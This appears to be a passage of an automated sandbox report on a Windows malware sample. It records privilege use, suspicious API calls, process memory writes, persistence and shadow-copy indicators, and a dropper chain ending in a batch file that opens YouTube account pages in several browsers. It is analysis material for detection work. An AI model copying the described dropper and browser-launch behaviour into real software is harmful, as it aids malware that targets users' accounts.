Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\1000029002\e378e7234d.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3012 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 3012 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 3012 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 3900 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe
PID 3900 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe
PID 3900 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe
PID 212 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe C:\Windows\system32\cmd.exe
PID 1160 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1160 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1160 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1160 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1160 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1160 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2664 wrote to memory of 4256 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2664 wrote to memory of 4256 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2868 wrote to memory of 2040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2868 wrote to memory of 2040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2736 wrote to memory of 2988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2988 wrote to memory of 4372 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe

"C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\600E.tmp\600F.tmp\6010.bat C:\Users\Admin\AppData\Local\Temp\1000020001\d42f45addf.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9c6e8cc40,0x7ff9c6e8cc4c,0x7ff9c6e8cc58

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff9c6d446f8,0x7ff9c6d44708,0x7ff9c6d44718

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {156e0aec-bca6-4f94-a198-ba3136a75a97} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" gpu

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,2160292829993695174,13107373814861137253,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=1916 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,2160292829993695174,13107373814861137253,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,2160292829993695174,13107373814861137253,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2260 /prefetch:8

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2392 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {00c11624-cd53-4f2c-b62e-40a4e3bf8ee1} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1448 -childID 1 -isForBrowser -prefsHandle 2628 -prefMapHandle 2872 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a70bca7-0a2b-4c7a-913f-74b68ceb9488} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1288087401917952318,12147926574540698710,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1308 -childID 2 -isForBrowser -prefsHandle 3600 -prefMapHandle 2956 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3a880cb-bb4f-4dc2-b9c9-ec225add4fbc} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4180 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4128 -prefMapHandle 4164 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49c5470e-98b9-449c-a346-010d520141d7} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" utility

C:\Windows\System32\CompPkgSrv.exe

